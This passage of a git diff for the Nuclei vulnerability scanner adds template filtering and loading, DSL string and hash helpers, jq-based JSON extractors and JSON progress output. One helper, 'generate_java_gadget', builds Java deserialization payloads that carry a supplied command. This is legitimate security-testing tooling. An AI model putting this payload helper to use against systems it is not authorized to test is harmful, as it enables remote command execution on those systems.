+ for _, val := range splitCommaTrim(tag) { + if _, ok := filter.authors[val]; !ok { + filter.authors[val] = struct{}{} + } + } + } + for _, tag := range config.Tags { + for _, val := range splitCommaTrim(tag) { + if _, ok := filter.allowedTags[val]; !ok { + filter.allowedTags[val] = struct{}{} + } + delete(filter.block, val) + } + } + for _, tag := range config.IncludeTags { + for _, val := range splitCommaTrim(tag) { + if _, ok := filter.matchAllows[val]; !ok { + filter.matchAllows[val] = struct{}{} + } + delete(filter.block, val) + } + } + return filter +} + +func splitCommaTrim(value string) []string { + if !strings.Contains(value, ",") { + return []string{strings.ToLower(value)} + } + splitted := strings.Split(value, ",") + final := make([]string, len(splitted)) + for i, value := range splitted { + final[i] = strings.ToLower(strings.TrimSpace(value)) + } + return final +} diff --git a/v2/pkg/catalog/loader/filter/tag_filter_test.go b/v2/pkg/catalog/loader/filter/tag_filter_test.go new file mode 100644 index 0000000000..6eb3617780 --- /dev/null +++ b/v2/pkg/catalog/loader/filter/tag_filter_test.go @@ -0,0 +1,84 @@ +package filter + +import ( + "testing" + + "github.com/stretchr/testify/require" +) + +func TestTagBasedFilter(t *testing.T) { + config := &Config{ + Tags: []string{"cves", "2021", "jira"}, + } + filter := New(config) + + t.Run("true", func(t *testing.T) { + matched, _ := filter.Match("jira", "pdteam", "low") + require.True(t, matched, "could not get correct match") + }) + t.Run("false", func(t *testing.T) { + matched, _ := filter.Match("consul", "pdteam", "low") + require.False(t, matched, "could not get correct match") + }) + t.Run("not-match-excludes", func(t *testing.T) { + config := &Config{ + ExcludeTags: []string{"dos"}, + } + filter := New(config) + matched, err := filter.Match("dos", "pdteam", "low") + require.False(t, matched, "could not get correct match") + require.Equal(t, ErrExcluded, err, "could not get correct error") + }) + t.Run("match-includes", func(t *testing.T) { + config := &Config{ + Tags: []string{"cves", "fuzz"}, + ExcludeTags: []string{"dos", "fuzz"}, + IncludeTags: []string{"fuzz"}, + } + filter := New(config) + matched, err := filter.Match("fuzz", "pdteam", "low") + require.Nil(t, err, "could not get match") + require.True(t, matched, "could not get correct match") + }) + t.Run("match-author", func(t *testing.T) { + config := &Config{ + Authors: []string{"pdteam"}, + } + filter := New(config) + matched, _ := filter.Match("fuzz", "pdteam", "low") + require.True(t, matched, "could not get correct match") + }) + t.Run("match-severity", func(t *testing.T) { + config := &Config{ + Severities: []string{"high"}, + } + filter := New(config) + matched, _ := filter.Match("fuzz", "pdteam", "high") + require.True(t, matched, "could not get correct match") + }) + t.Run("match-exclude-with-tags", func(t *testing.T) { + config := &Config{ + Tags: []string{"tag"}, + ExcludeTags: []string{"another"}, + } + filter := New(config) + matched, _ := filter.Match("another", "pdteam", "high") + require.False(t, matched, "could not get correct match") + }) + t.Run("match-conditions", func(t *testing.T) { + config := &Config{ + Authors: []string{"pdteam"}, + Tags: []string{"jira"}, + Severities: []string{"high"}, + } + filter := New(config) + matched, _ := filter.Match("jira", "pdteam", "high") + require.True(t, matched, "could not get correct match") + matched, _ = filter.Match("jira", "pdteam", "low") + require.False(t, matched, "could not get correct match") + matched, _ = filter.Match("jira", "random", "low") + require.False(t, matched, "could not get correct match") + matched, _ = filter.Match("consul", "random", "low") + require.False(t, matched, "could not get correct match") + }) +} diff --git a/v2/pkg/catalog/loader/load/load.go b/v2/pkg/catalog/loader/load/load.go new file mode 100644 index 0000000000..391161a7d0 --- /dev/null +++ b/v2/pkg/catalog/loader/load/load.go @@ -0,0 +1,100 @@ +package load + +import ( + "bytes" + "errors" + "io/ioutil" + "os" + "strings" + + "github.com/projectdiscovery/nuclei/v2/pkg/catalog/loader/filter" + "github.com/projectdiscovery/nuclei/v2/pkg/types" + "gopkg.in/yaml.v2" +) + +// Load loads a template by parsing metadata and running +// all tag and path based filters on the template. +func Load(templatePath string, workflow bool, customTags []string, tagFilter *filter.TagFilter) (bool, error) { + f, err := os.Open(templatePath) + if err != nil { + return false, err + } + defer f.Close() + + data, err := ioutil.ReadAll(f) + if err != nil { + return false, err + } + + template := make(map[string]interface{}) + err = yaml.NewDecoder(bytes.NewReader(data)).Decode(template) + if err != nil { + return false, err + } + + info, ok := template["info"] + if !ok { + return false, errors.New("no template info field provided") + } + infoMap, ok := info.(map[interface{}]interface{}) + if !ok { + return false, errors.New("could not get info") + } + + if _, nameOk := infoMap["name"]; !nameOk { + return false, errors.New("no template name field provided") + } + author, ok := infoMap["author"] + if !ok { + return false, errors.New("no template author field provided") + } + severity, ok := infoMap["severity"] + if !ok { + severity = "" + } + + templateTags, ok := infoMap["tags"] + if !ok { + templateTags = "" + } + tagStr := types.ToString(templateTags) + + tags := strings.Split(tagStr, ",") + severityStr := strings.ToLower(types.ToString(severity)) + authors := strings.Split(types.ToString(author), ",") + + matched := false + + _, workflowsFound := template["workflows"] + if !workflowsFound && workflow { + return false, nil + } + if workflow { + return true, nil + } + for _, tag := range tags { + for _, author := range authors { + var match bool + var err error + + if len(customTags) == 0 { + match, err = tagFilter.Match(strings.ToLower(strings.TrimSpace(tag)), strings.ToLower(strings.TrimSpace(author)), severityStr) + } else { + match, err = tagFilter.MatchWithAllowedTags(customTags, strings.ToLower(strings.TrimSpace(tag)), strings.ToLower(strings.TrimSpace(author)), severityStr) + } + if err == filter.ErrExcluded { + return false, filter.ErrExcluded + } + if !matched && match { + matched = true + } + } + } + if !matched { + return false, nil + } + if workflowsFound && !workflow { + return false, nil + } + return true, nil +} diff --git a/v2/pkg/catalog/loader/loader.go b/v2/pkg/catalog/loader/loader.go new file mode 100644 index 0000000000..37b75943f4 --- /dev/null +++ b/v2/pkg/catalog/loader/loader.go @@ -0,0 +1,202 @@ +package loader + +import ( + "strings" + + "github.com/projectdiscovery/gologger" + "github.com/projectdiscovery/nuclei/v2/pkg/catalog" + "github.com/projectdiscovery/nuclei/v2/pkg/catalog/loader/filter" + "github.com/projectdiscovery/nuclei/v2/pkg/catalog/loader/load" + "github.com/projectdiscovery/nuclei/v2/pkg/protocols" + "github.com/projectdiscovery/nuclei/v2/pkg/templates" +) + +// Config contains the configuration options for the loader +type Config struct { + Templates []string + Workflows []string + ExcludeTemplates []string + IncludeTemplates []string + + Tags []string + ExcludeTags []string + Authors []string + Severities []string + IncludeTags []string + + Catalog *catalog.Catalog + ExecutorOptions protocols.ExecuterOptions + TemplatesDirectory string +} + +// Store is a storage for loaded nuclei templates +type Store struct { + tagFilter *filter.TagFilter + pathFilter *filter.PathFilter + config *Config + finalTemplates []string + + templates []*templates.Template + workflows []*templates.Template + + preprocessor templates.Preprocessor +} + +// New creates a new template store based on provided configuration +func New(config *Config) (*Store, error) { + // Create a tag filter based on provided configuration + store := &Store{ + config: config, + tagFilter: filter.New(&filter.Config{ + Tags: config.Tags, + ExcludeTags: config.ExcludeTags, + Authors: config.Authors, + Severities: config.Severities, + IncludeTags: config.IncludeTags, + }), + pathFilter: filter.NewPathFilter(&filter.PathFilterConfig{ + IncludedTemplates: config.IncludeTemplates, + ExcludedTemplates: config.ExcludeTemplates, + }, config.Catalog), + } + + // Handle a case with no templates or workflows, where we use base directory + if len(config.Templates) == 0 && len(config.Workflows) == 0 { + config.Templates = append(config.Templates, config.TemplatesDirectory) + } + store.finalTemplates = append(store.finalTemplates, config.Templates...) + return store, nil +} + +// Templates returns all the templates in the store +func (s *Store) Templates() []*templates.Template { + return s.templates +} + +// Workflows returns all the workflows in the store +func (s *Store) Workflows() []*templates.Template { + return s.workflows +} + +// RegisterPreprocessor allows a custom preprocessor to be passed to the store to run against templates +func (s *Store) RegisterPreprocessor(preprocessor templates.Preprocessor) { + s.preprocessor = preprocessor +} + +// Load loads all the templates from a store, performs filtering and returns +// the complete compiled templates for a nuclei execution configuration. +func (s *Store) Load() { + s.templates = s.LoadTemplates(s.finalTemplates) + s.workflows = s.LoadWorkflows(s.config.Workflows) +} + +// ValidateTemplates takes a list of templates and validates them +// erroring out on discovering any faulty templates. +func (s *Store) ValidateTemplates(templatesList, workflowsList []string) bool { + includedTemplates := s.config.Catalog.GetTemplatesPath(templatesList) + includedWorkflows := s.config.Catalog.GetTemplatesPath(workflowsList) + templatesMap := s.pathFilter.Match(includedTemplates) + workflowsMap := s.pathFilter.Match(includedWorkflows) + + notErrored := true + for k := range templatesMap { + _, err := s.loadTemplate(k, false) + if err != nil { + if strings.Contains(err.Error(), "cannot create template executer") { + continue + } + if err == filter.ErrExcluded { + continue + } + notErrored = false + gologger.Error().Msgf("Error occurred loading template %s: %s\n", k, err) + continue + } + _, err = templates.Parse(k, s.preprocessor, s.config.ExecutorOptions) + if err != nil { + if strings.Contains(err.Error(), "cannot create template executer") { + continue + } + if err == filter.ErrExcluded { + continue + } + notErrored = false + gologger.Error().Msgf("Error occurred parsing template %s: %s\n", k, err) + } + } + for k := range workflowsMap { + _, err := s.loadTemplate(k, true) + if err != nil { + if strings.Contains(err.Error(), "cannot create template executer") { + continue + } + if err == filter.ErrExcluded { + continue + } + notErrored = false + gologger.Error().Msgf("Error occurred loading workflow %s: %s\n", k, err) + } + _, err = templates.Parse(k, s.preprocessor, s.config.ExecutorOptions) + if err != nil { + if strings.Contains(err.Error(), "cannot create template executer") { + continue + } + if err == filter.ErrExcluded { + continue + } + notErrored = false + gologger.Error().Msgf("Error occurred parsing workflow %s: %s\n", k, err) + } + } + return notErrored +} + +// LoadTemplates takes a list of templates and returns paths for them +func (s *Store) LoadTemplates(templatesList []string) []*templates.Template { + includedTemplates := s.config.Catalog.GetTemplatesPath(templatesList) + templatesMap := s.pathFilter.Match(includedTemplates) + + loadedTemplates := make([]*templates.Template, 0, len(templatesMap)) + for k := range templatesMap { + loaded, err := s.loadTemplate(k, false) + if err != nil { + gologger.Warning().Msgf("Could not load template %s: %s\n", k, err) + } + if loaded { + parsed, err := templates.Parse(k, s.preprocessor, s.config.ExecutorOptions) + if err != nil { + gologger.Warning().Msgf("Could not parse template %s: %s\n", k, err) + } else if parsed != nil { + loadedTemplates = append(loadedTemplates, parsed) + } + } + } + return loadedTemplates +} + +// LoadWorkflows takes a list of workflows and returns paths for them +func (s *Store) LoadWorkflows(workflowsList []string) []*templates.Template { + includedWorkflows := s.config.Catalog.GetTemplatesPath(s.config.Workflows) + workflowsMap := s.pathFilter.Match(includedWorkflows) + + loadedWorkflows := make([]*templates.Template, 0, len(workflowsMap)) + for k := range workflowsMap { + loaded, err := s.loadTemplate(k, true) + if err != nil { + gologger.Warning().Msgf("Could not load workflow %s: %s\n", k, err) + } + if loaded { + parsed, err := templates.Parse(k, s.preprocessor, s.config.ExecutorOptions) + if err != nil { + gologger.Warning().Msgf("Could not parse workflow %s: %s\n", k, err) + } else if parsed != nil { + loadedWorkflows = append(loadedWorkflows, parsed) + } + } + } + return loadedWorkflows +} + +func (s *Store) loadTemplate(templatePath string, workflow bool) (bool, error) { + return load.Load(templatePath, workflow, nil, s.tagFilter) +} diff --git a/v2/pkg/catalog/loader/loader_test.go b/v2/pkg/catalog/loader/loader_test.go new file mode 100644 index 0000000000..b9f6ab43e2 --- /dev/null +++ b/v2/pkg/catalog/loader/loader_test.go @@ -0,0 +1,40 @@ +package loader + +import ( + "testing" + + "github.com/stretchr/testify/require" +) + +func TestLoadTemplates(t *testing.T) { + store, err := New(&Config{ + Templates: []string{"cves/CVE-2021-21315.yaml"}, + }) + require.Nil(t, err, "could not load templates") + require.Equal(t, []string{"cves/CVE-2021-21315.yaml"}, store.finalTemplates, "could not get correct templates") + + templatesDirectory := "/test" + t.Run("blank", func(t *testing.T) { + store, err := New(&Config{ + TemplatesDirectory: templatesDirectory, + }) + require.Nil(t, err, "could not load templates") + require.Equal(t, []string{templatesDirectory}, store.finalTemplates, "could not get correct templates") + }) + t.Run("only-tags", func(t *testing.T) { + store, err := New(&Config{ + Tags: []string{"cves"}, + TemplatesDirectory: templatesDirectory, + }) + require.Nil(t, err, "could not load templates") + require.Equal(t, []string{templatesDirectory}, store.finalTemplates, "could not get correct templates") + }) + t.Run("tags-with-path", func(t *testing.T) { + store, err := New(&Config{ + Tags: []string{"cves"}, + TemplatesDirectory: templatesDirectory, + }) + require.Nil(t, err, "could not load templates") + require.Equal(t, []string{templatesDirectory}, store.finalTemplates, "could not get correct templates") + }) +} diff --git a/v2/pkg/operators/common/dsl/dsl.go b/v2/pkg/operators/common/dsl/dsl.go new file mode 100644 index 0000000000..8116ef1363 --- /dev/null +++ b/v2/pkg/operators/common/dsl/dsl.go @@ -0,0 +1,285 @@ +package dsl + +import ( + "crypto/md5" + "crypto/sha1" + "crypto/sha256" + "encoding/base64" + "encoding/hex" + "errors" + "fmt" + "html" + "math" + "math/rand" + "net/url" + "regexp" + "strings" + "time" + + "github.com/Knetic/govaluate" + "github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/helpers/deserialization" + "github.com/projectdiscovery/nuclei/v2/pkg/types" + "github.com/spaolacci/murmur3" +) + +const ( + numbers = "1234567890" + letters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" + withCutSetArgsSize = 2 + withBaseRandArgsSize = 3 + withMaxRandArgsSize = withCutSetArgsSize +) + +var functions = map[string]govaluate.ExpressionFunction{ + "len": func(args ...interface{}) (interface{}, error) { + length := len(types.ToString(args[0])) + return float64(length), nil + }, + "toupper": func(args ...interface{}) (interface{}, error) { + return strings.ToUpper(types.ToString(args[0])), nil + }, + "tolower": func(args ...interface{}) (interface{}, error) { + return strings.ToLower(types.ToString(args[0])), nil + }, + "replace": func(args ...interface{}) (interface{}, error) { + return strings.ReplaceAll(types.ToString(args[0]), types.ToString(args[1]), types.ToString(args[2])), nil + }, + "replace_regex": func(args ...interface{}) (interface{}, error) { + compiled, err := regexp.Compile(types.ToString(args[1])) + if err != nil { + return nil, err + } + return compiled.ReplaceAllString(types.ToString(args[0]), types.ToString(args[2])), nil + }, + "trim": func(args ...interface{}) (interface{}, error) { + return strings.Trim(types.ToString(args[0]), types.ToString(args[2])), nil + }, + "trimleft": func(args ...interface{}) (interface{}, error) { + return strings.TrimLeft(types.ToString(args[0]), types.ToString(args[1])), nil + }, + "trimright": func(args ...interface{}) (interface{}, error) { + return strings.TrimRight(types.ToString(args[0]), types.ToString(args[1])), nil + }, + "trimspace": func(args ...interface{}) (interface{}, error) { + return strings.TrimSpace(types.ToString(args[0])), nil + }, + "trimprefix": func(args ...interface{}) (interface{}, error) { + return strings.TrimPrefix(types.ToString(args[0]), types.ToString(args[1])), nil + }, + "trimsuffix": func(args ...interface{}) (interface{}, error) { + return strings.TrimSuffix(types.ToString(args[0]), types.ToString(args[1])), nil + }, + "reverse": func(args ...interface{}) (interface{}, error) { + return reverseString(types.ToString(args[0])), nil + }, + // encoding + "base64": func(args ...interface{}) (interface{}, error) { + sEnc := base64.StdEncoding.EncodeToString([]byte(types.ToString(args[0]))) + + return sEnc, nil + }, + // python encodes to base64 with lines of 76 bytes terminated by new line "\n" + "base64_py": func(args ...interface{}) (interface{}, error) { + sEnc := base64.StdEncoding.EncodeToString([]byte(types.ToString(args[0]))) + return deserialization.InsertInto(sEnc, 76, '\n'), nil + }, + "base64_decode": func(args ...interface{}) (interface{}, error) { + return base64.StdEncoding.DecodeString(types.ToString(args[0])) + }, + "url_encode": func(args ...interface{}) (interface{}, error) { + return url.PathEscape(types.ToString(args[0])), nil + }, + "url_decode": func(args ...interface{}) (interface{}, error) { + return url.PathUnescape(types.ToString(args[0])) + }, + "hex_encode": func(args ...interface{}) (interface{}, error) { + return hex.EncodeToString([]byte(types.ToString(args[0]))), nil + }, + "hex_decode": func(args ...interface{}) (interface{}, error) { + hx, _ := hex.DecodeString(types.ToString(args[0])) + return string(hx), nil + }, + "html_escape": func(args ...interface{}) (interface{}, error) { + return html.EscapeString(types.ToString(args[0])), nil + }, + "html_unescape": func(args ...interface{}) (interface{}, error) { + return html.UnescapeString(types.ToString(args[0])), nil + }, + // hashing + "md5": func(args ...interface{}) (interface{}, error) { + hash := md5.Sum([]byte(types.ToString(args[0]))) + + return hex.EncodeToString(hash[:]), nil + }, + "sha256": func(args ...interface{}) (interface{}, error) { + h := sha256.New() + _, err := h.Write([]byte(types.ToString(args[0]))) + + if err != nil { + return nil, err + } + return hex.EncodeToString(h.Sum(nil)), nil + }, + "sha1": func(args ...interface{}) (interface{}, error) { + h := sha1.New() + _, err := h.Write([]byte(types.ToString(args[0]))) + + if err != nil { + return nil, err + } + return hex.EncodeToString(h.Sum(nil)), nil + }, + "mmh3": func(args ...interface{}) (interface{}, error) { + return fmt.Sprintf("%d", int32(murmur3.Sum32WithSeed([]byte(types.ToString(args[0])), 0))), nil + }, + // search + "contains": func(args ...interface{}) (interface{}, error) { + return strings.Contains(types.ToString(args[0]), types.ToString(args[1])), nil + }, + "regex": func(args ...interface{}) (interface{}, error) { + compiled, err := regexp.Compile(types.ToString(args[0])) + if err != nil { + return nil, err + } + return compiled.MatchString(types.ToString(args[1])), nil + }, + // random generators + "rand_char": func(args ...interface{}) (interface{}, error) { + chars := letters + numbers + bad := "" + if len(args) >= 1 { + chars = types.ToString(args[0]) + } + if len(args) >= withCutSetArgsSize { + bad = types.ToString(args[1]) + } + chars = trimAll(chars, bad) + return chars[rand.Intn(len(chars))], nil + }, + "rand_base": func(args ...interface{}) (interface{}, error) { + l := 0 + bad := "" + base := letters + numbers + + if len(args) >= 1 { + l = args[0].(int) + } + if len(args) >= withCutSetArgsSize { + bad = types.ToString(args[1]) + } + if len(args) >= withBaseRandArgsSize { + base = types.ToString(args[2]) + } + base = trimAll(base, bad) + return randSeq(base, l), nil + }, + "rand_text_alphanumeric": func(args ...interface{}) (interface{}, error) { + l := 0 + bad := "" + chars := letters + numbers + + if len(args) >= 1 { + l = args[0].(int) + } + if len(args) >= withCutSetArgsSize { + bad = types.ToString(args[1]) + } + chars = trimAll(chars, bad) + return randSeq(chars, l), nil + }, + "rand_text_alpha": func(args ...interface{}) (interface{}, error) { + l := 0 + bad := "" + chars := letters + + if len(args) >= 1 { + l = args[0].(int) + } + if len(args) >= withCutSetArgsSize { + bad = types.ToString(args[1]) + } + chars = trimAll(chars, bad) + return randSeq(chars, l), nil + }, + "rand_text_numeric": func(args ...interface{}) (interface{}, error) { + l := 0 + bad := "" + chars := numbers + + if len(args) >= 1 { + l = args[0].(int) + } + if len(args) >= withCutSetArgsSize { + bad = types.ToString(args[1]) + } + chars = trimAll(chars, bad) + return randSeq(chars, l), nil + }, + "rand_int": func(args ...interface{}) (interface{}, error) { + min := 0 + max := math.MaxInt32 + + if len(args) >= 1 { + min = args[0].(int) + } + if len(args) >= withMaxRandArgsSize { + max = args[1].(int) + } + return rand.Intn(max-min) + min, nil + }, + // Time Functions + "waitfor": func(args ...interface{}) (interface{}, error) { + seconds := args[0].(float64) + time.Sleep(time.Duration(seconds) * time.Second) + return true, nil + }, + // deserialization Functions + "generate_java_gadget": func(args ...interface{}) (interface{}, error) { + gadget := args[0].(string) + cmd := args[1].(string) + + var encoding string + if len(args) > 2 { + encoding = args[2].(string) + } + data := deserialization.GenerateJavaGadget(gadget, cmd, encoding) + return data, nil + }, +} + +// HelperFunctions returns the dsl helper functions +func HelperFunctions() map[string]govaluate.ExpressionFunction { + return functions +} + +// AddHelperFunction allows creation of additiona helper functions to be supported with templates +func AddHelperFunction(key string, value func(args ...interface{}) (interface{}, error)) error { + if _, ok := functions[key]; !ok { + functions[key] = value + return nil + } + return errors.New("duplicate helper function key defined") +} + +func reverseString(s string) string { + runes := []rune(s) + for i, j := 0, len(runes)-1; i < j; i, j = i+1, j-1 { + runes[i], runes[j] = runes[j], runes[i] + } + return string(runes) +} + +func trimAll(s, cutset string) string { + for _, c := range cutset { + s = strings.ReplaceAll(s, string(c), "") + } + return s +} + +func randSeq(base string, n int) string { + b := make([]rune, n) + for i := range b { + b[i] = rune(base[rand.Intn(len(base))]) + } + return string(b) +} diff --git a/v2/pkg/operators/extractors/compile.go b/v2/pkg/operators/extractors/compile.go index b189c3de1f..341340a380 100644 --- a/v2/pkg/operators/extractors/compile.go +++ b/v2/pkg/operators/extractors/compile.go @@ -4,6 +4,8 @@ import ( "fmt" "regexp" "strings" + + "github.com/itchyny/gojq" ) // CompileExtractors performs the initial setup operation on a extractor @@ -28,6 +30,18 @@ func (e *Extractor) CompileExtractors() error { e.KVal[i] = strings.ToLower(kval) } + for _, query := range e.JSON { + query, err := gojq.Parse(query) + if err != nil { + return fmt.Errorf("could not parse json: %s", query) + } + compiled, err := gojq.Compile(query) + if err != nil { + return fmt.Errorf("could not compile json: %s", query) + } + e.jsonCompiled = append(e.jsonCompiled, compiled) + } + // Setup the part of the request to match, if any. if e.Part == "" { e.Part = "body" diff --git a/v2/pkg/operators/extractors/extract.go b/v2/pkg/operators/extractors/extract.go index 5fecdcf9f6..58845a8330 100644 --- a/v2/pkg/operators/extractors/extract.go +++ b/v2/pkg/operators/extractors/extract.go @@ -1,6 +1,8 @@ package extractors import ( + "encoding/json" + "github.com/projectdiscovery/nuclei/v2/pkg/types" ) @@ -42,3 +44,41 @@ func (e *Extractor) ExtractKval(data map[string]interface{}) map[string]struct{} } return results } + +// ExtractJSON extracts text from a corpus using JQ queries and returns it +func (e *Extractor) ExtractJSON(corpus string) map[string]struct{} { + results := make(map[string]struct{}) + + var jsonObj interface{} + + err := json.Unmarshal([]byte(corpus), &jsonObj) + + if err != nil { + return results + } + + for _, k := range e.jsonCompiled { + iter := k.Run(jsonObj) + for { + v, ok := iter.Next() + if !ok { + break + } + if _, ok := v.(error); ok { + break + } + var result string + if res, err := types.JSONScalarToString(v); err == nil { + result = res + } else if res, err := json.Marshal(v); err == nil { + result = string(res) + } else { + result = types.ToString(v) + } + if _, ok := results[result]; !ok { + results[result] = struct{}{} + } + } + } + return results +} diff --git a/v2/pkg/operators/extractors/extractors.go b/v2/pkg/operators/extractors/extractors.go index f593a1747d..2542bb0d4c 100644 --- a/v2/pkg/operators/extractors/extractors.go +++ b/v2/pkg/operators/extractors/extractors.go @@ -1,6 +1,10 @@ package extractors -import "regexp" +import ( + "regexp" + + "github.com/itchyny/gojq" +) // Extractor is used to extract part of response using a regex. type Extractor struct { @@ -21,6 +25,11 @@ type Extractor struct { // KVal are the kval to be present in the response headers/cookies KVal []string `yaml:"kval,omitempty"` + // JSON are the json pattern required to be present in the response + JSON []string `yaml:"json"` + // jsonCompiled is the compiled variant + jsonCompiled []*gojq.Code + // Part is the part of the request to match // // By default, matching is performed in request body. @@ -37,12 +46,15 @@ const ( RegexExtractor ExtractorType = iota + 1 // KValExtractor extracts responses with key:value KValExtractor + // JSONExtractor extracts responses with json + JSONExtractor ) // ExtractorTypes is an table for conversion of extractor type from string. var ExtractorTypes = map[string]ExtractorType{ "regex": RegexExtractor, "kval": KValExtractor, + "json": JSONExtractor, } // GetType returns the type of the matcher diff --git a/v2/pkg/operators/operators.go b/v2/pkg/operators/operators.go index 87886e64d2..2497fa494a 100644 --- a/v2/pkg/operators/operators.go +++ b/v2/pkg/operators/operators.go @@ -162,3 +162,21 @@ func (r *Operators) Execute(data map[string]interface{}, match MatchFunc, extrac } return nil, false } + +// ExecuteInternalExtractors executes internal dynamic extractors +func (r *Operators) ExecuteInternalExtractors(data map[string]interface{}, extract ExtractFunc) map[string]interface{} { + dynamicValues := make(map[string]interface{}) + + // Start with the extractors first and evaluate them. + for _, extractor := range r.Extractors { + if !extractor.Internal { + continue + } + for match := range extract(data, extractor) { + if _, ok := dynamicValues[extractor.Name]; !ok { + dynamicValues[extractor.Name] = match + } + } + } + return dynamicValues +} diff --git a/v2/pkg/output/format_screen.go b/v2/pkg/output/format_screen.go index 2a57a88fb0..cee106d4d4 100644 --- a/v2/pkg/output/format_screen.go +++ b/v2/pkg/output/format_screen.go @@ -54,7 +54,7 @@ func (w *StandardWriter) formatScreen(output *ResultEvent) []byte { if len(output.Metadata) > 0 { builder.WriteString(" [") - var first bool = true + first := true for name, value := range output.Metadata { if !first { builder.WriteRune(',') diff --git a/v2/pkg/output/output.go b/v2/pkg/output/output.go index 2fac10fd7f..ffe1b180b4 100644 --- a/v2/pkg/output/output.go +++ b/v2/pkg/output/output.go @@ -54,6 +54,8 @@ type InternalWrappedEvent struct { type ResultEvent struct { // TemplateID is the ID of the template for the result. TemplateID string `json:"templateID"` + // TemplatePath is the path of template + TemplatePath string `json:"-"` // Info contains information block of the template for the result. Info map[string]interface{} `json:"info,inline"` // MatcherName is the name of the matcher matched if any. @@ -82,6 +84,8 @@ type ResultEvent struct { Timestamp time.Time `json:"timestamp"` // Interaction is the full details of interactsh interaction. Interaction *server.Interaction `json:"interaction,omitempty"` + + FileToIndexPosition map[string]int `json:"-"` } // NewStandardWriter creates a new output writer based on user configurations diff --git a/v2/pkg/progress/progress.go b/v2/pkg/progress/progress.go index 0ec2626f4a..220ff49a68 100644 --- a/v2/pkg/progress/progress.go +++ b/v2/pkg/progress/progress.go @@ -6,6 +6,7 @@ import ( "fmt" "net" "net/http" + "os" "strconv" "strings" "time" @@ -39,13 +40,14 @@ var _ Progress = &StatsTicker{} // StatsTicker is a progress instance for showing program stats type StatsTicker struct { active bool - tickDuration time.Duration - stats clistats.StatisticsClient + outputJSON bool server *http.Server + stats clistats.StatisticsClient + tickDuration time.Duration } // NewStatsTicker creates and returns a new progress tracking object. -func NewStatsTicker(duration int, active, metrics bool, port int) (Progress, error) { +func NewStatsTicker(duration int, active, outputJSON, metrics bool, port int) (Progress, error) { var tickDuration time.Duration if active { tickDuration = time.Duration(duration) * time.Second @@ -62,6 +64,7 @@ func NewStatsTicker(duration int, active, metrics bool, port int) (Progress, err progress.active = active progress.stats = stats progress.tickDuration = tickDuration + progress.outputJSON = outputJSON if metrics { http.HandleFunc("/metrics", func(w http.ResponseWriter, req *http.Request) { @@ -92,7 +95,13 @@ func (p *StatsTicker) Init(hostCount int64, rulesCount int, requestCount int64) p.stats.AddCounter("total", uint64(requestCount)) if p.active { - if err := p.stats.Start(printCallback, p.tickDuration); err != nil { + var printCallbackFunc clistats.PrintCallback + if p.outputJSON { + printCallbackFunc = printCallbackJSON + } else { + printCallbackFunc = printCallback + } + if err := p.stats.Start(printCallbackFunc, p.tickDuration); err != nil { gologger.Warning().Msgf("Couldn't start statistics: %s", err) } } @@ -167,30 +176,35 @@ func printCallback(stats clistats.StatisticsClient) { builder.WriteRune(')') builder.WriteRune('\n') - gologger.Print().Msgf("%s", builder.String()) + fmt.Fprintf(os.Stderr, "%s", builder.String()) } -// getMetrics returns a map of important metrics for client -func (p *StatsTicker) getMetrics() map[string]interface{} { +func printCallbackJSON(stats clistats.StatisticsClient) { + builder := &strings.Builder{} + _ = json.NewEncoder(builder).Encode(metricsMap(stats)) + fmt.Fprintf(os.Stderr, "%s", builder.String()) +} + +func metricsMap(stats clistats.StatisticsClient) map[string]interface{} { results := make(map[string]interface{}) - startedAt, _ := p.stats.GetStatic("startedAt") + startedAt, _ := stats.GetStatic("startedAt") duration := time.Since(startedAt.(time.Time)) results["startedAt"] = startedAt.(time.Time) results["duration"] = fmtDuration(duration) - templates, _ := p.stats.GetStatic("templates") + templates, _ := stats.GetStatic("templates") results["templates"] = clistats.String(templates) - hosts, _ := p.stats.GetStatic("hosts") + hosts, _ := stats.GetStatic("hosts") results["hosts"] = clistats.String(hosts) - matched, _ := p.stats.GetCounter("matched") + matched, _ := stats.GetCounter("matched") results["matched"] = clistats.String(matched) - requests, _ := p.stats.GetCounter("requests") + requests, _ := stats.GetCounter("requests") results["requests"] = clistats.String(requests) - total, _ := p.stats.GetCounter("total") + total, _ := stats.GetCounter("total") results["total"] = clistats.String(total) results["rps"] = clistats.String(uint64(float64(requests) / duration.Seconds())) - errors, _ := p.stats.GetCounter("errors") + errors, _ := stats.GetCounter("errors") results["errors"] = clistats.String(errors) //nolint:gomnd // this is not a magic number @@ -200,6 +214,11 @@ func (p *StatsTicker) getMetrics() map[string]interface{} { return results } +// getMetrics returns a map of important metrics for client +func (p *StatsTicker) getMetrics() map[string]interface{} { + return metricsMap(p.stats) +} + // fmtDuration formats the duration for the time elapsed func fmtDuration(d time.Duration) string { d = d.Round(time.Second) @@ -215,7 +234,11 @@ func fmtDuration(d time.Duration) string { func (p *StatsTicker) Stop() { if p.active { // Print one final summary - printCallback(p.stats) + if p.outputJSON { + printCallbackJSON(p.stats) + } else { + printCallback(p.stats) + } if err := p.stats.Stop(); err != nil { gologger.Warning().Msgf("Couldn't stop statistics: %s", err) } diff --git a/v2/pkg/protocols/common/clusterer/executer.go b/v2/pkg/protocols/common/clusterer/executer.go index 84207ab11e..758e99b837 100644 --- a/v2/pkg/protocols/common/clusterer/executer.go +++ b/v2/pkg/protocols/common/clusterer/executer.go @@ -22,6 +22,7 @@ type Executer struct { type clusteredOperator struct { templateID string + templatePath string templateInfo map[string]interface{} operator *operators.Operators } @@ -38,6 +39,7 @@ func NewExecuter(requests []*templates.Template, options *protocols.ExecuterOpti executer.operators = append(executer.operators, &clusteredOperator{ templateID: req.ID, templateInfo: req.Info, + templatePath: req.Path, operator: req.RequestsHTTP[0].CompiledOperators, }) } @@ -60,13 +62,15 @@ func (e *Executer) Requests() int { func (e *Executer) Execute(input string) (bool, error) { var results bool + previous := make(map[string]interface{}) dynamicValues := make(map[string]interface{}) - err := e.requests.ExecuteWithResults(input, dynamicValues, nil, func(event *output.InternalWrappedEvent) { + err := e.requests.ExecuteWithResults(input, dynamicValues, previous, func(event *output.InternalWrappedEvent) { for _, operator := range e.operators { result, matched := operator.operator.Execute(event.InternalEvent, e.requests.Match, e.requests.Extract) if matched && result != nil { event.OperatorsResult = result event.InternalEvent["template-id"] = operator.templateID + event.InternalEvent["template-path"] = operator.templatePath event.InternalEvent["template-info"] = operator.templateInfo event.Results = e.requests.MakeResultEvent(event) results = true @@ -94,6 +98,7 @@ func (e *Executer) ExecuteWithResults(input string, callback 